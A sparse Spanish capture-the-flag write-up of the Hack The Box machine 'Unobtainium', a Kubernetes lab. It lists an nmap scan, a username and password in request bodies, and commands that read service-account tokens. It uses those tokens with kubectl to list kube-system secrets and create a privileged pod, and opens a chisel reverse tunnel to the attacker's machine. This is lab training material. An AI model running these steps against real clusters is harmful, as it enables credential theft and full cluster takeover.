# Unobtainium

**OS**: Linux \
**Dificultad**: Difícil
**Puntos**: 40

## Resumen

## Nmap Scan

`nmap -sV -sC -oN nmap.txt 10.10.10.235`

```
Nmap scan report for 10.10.10.235
Host is up (0.069s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e4:bf:68:42:e5:74:4b:06:58:78:bd:ed:1e:6a:df:66 (RSA)
|   256 bd:88:a1:d9:19:a0:12:35:ca:d3:fa:63:76:48:dc:65 (ECDSA)
|_  256 cf:c4:19:25:19:fa:6e:2e:b7:a4:aa:7d:c3:f1:3d:9b (ED25519)
80/tcp    open  http          Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Unobtainium
8443/tcp  open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 403 Forbidden
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 3082aa7f-e4b1-444a-a726-829587cd9e39
|     X-Kubernetes-Pf-Prioritylevel-Uid: c4131e14-5fda-4a46-8349-09ccbed9efdd
|     Date: Thu, 13 May 2021 15:34:26 GMT
|     Content-Length: 212
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 3082aa7f-e4b1-444a-a726-829587cd9e39
|     X-Kubernetes-Pf-Prioritylevel-Uid: c4131e14-5fda-4a46-8349-09ccbed9efdd
|     Date: Thu, 13 May 2021 15:34:25 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 3082aa7f-e4b1-444a-a726-829587cd9e39
|     X-Kubernetes-Pf-Prioritylevel-Uid: c4131e14-5fda-4a46-8349-09ccbed9efdd
|     Date: Thu, 13 May 2021 15:34:25 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
|_http-title: Site doesn't have a title (application/json).
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.10.235, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2021-05-12T15:02:11
|_Not valid after:  2022-05-13T15:02:11
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   h2
|_  http/1.1
31337/tcp open  http          Node.js Express framework
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
```

## Enumeración

## Escalada de Privilegios (User)

`{"auth":{"name":"felamos","password":"Winter2021"},"message":{"text":"test"}}`
`{"auth":{"name":"felamos","password":"Winter2021"},"filename":""}`

## Escalada de Privilegios (Root)

`cd /var/run/secrets/kubernetes.io/serviceaccount`
`cat ca.crt`
`cat token`


```
curl -LO "https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl" && chmod +x kubectl
```

`/opt/kubectl --certificate-authority=ca.crt --token $(cat token) --server=https://10.10.10.235:8443 auth can-i list secrets`
`/opt/kubectl --certificate-authority=ca.crt --token $(cat token) --server=https://10.10.10.235:8443 auth can-i list namespaces`
`/opt/kubectl --certificate-authority=ca.crt --token $(cat token) --server=https://10.10.10.235:8443 get namespace`
`/opt/kubectl --certificate-authority=ca.crt --token $(cat token) --server=https://10.10.10.235:8443 auth can-i list pods -n dev`
`/opt/kubectl --certificate-authority=ca.crt --token $(cat token) --server=https://10.10.10.235:8443 get pods -n dev`

`/opt/kubectl --certificate-authority=ca.crt --token $(cat token) --server=https://10.10.10.235:8443 describe pod/devnode-deployment-cd86fb5c-6ms8d -n dev`

`/opt/linux/chisel server -p 9000 --reverse`
`./chisel client 10.10.14.33:9000 R:3000:172.17.0.10:3000`


`cd /var/run/secrets/kubernetes.io/serviceaccount`
`cat ca.crt`
`cat token`

`/opt/kubectl --certificate-authority=ca2.crt --token $(cat token2) --server=https://10.10.10.235:8443 auth can-i list secrets -n kube-system`
`/opt/kubectl --certificate-authority=ca2.crt --token $(cat token2) --server=https://10.10.10.235:8443 get secrets -n kube-system`
`/opt/kubectl --certificate-authority=ca2.crt --token $(cat token2) --server=https://10.10.10.235:8443 describe secrets/c-admin-token-tfmp2 -n kube-system`

`/opt/kubectl --certificate-authority=ca2.crt --token $(cat token3) --server=https://10.10.10.235:8443 auth can-i create pod`

`/opt/kubectl --certificate-authority=ca2.crt --token $(cat token3) --server=https://10.10.10.235:8443 create -f doom.yaml`

## Referencias
https://github.com/Kirill89/prototype-pollution-explained \
https://snyk.io/vuln/SNYK-JS-LODASH-73638 \
https://snyk.io/vuln/SNYK-JS-GOOGLECLOUDSTORAGECOMMANDS-1050431 \
https://kubernetes.io/es/docs/tasks/tools/install-kubectl/ \
https://kubernetes.io/docs/reference/kubectl/cheatsheet/ \
https://github.com/jpillora/chisel \
https://github.com/BishopFox/badPods/tree/main/manifests/everything-allowed \
https://github.com/BishopFox/badPods
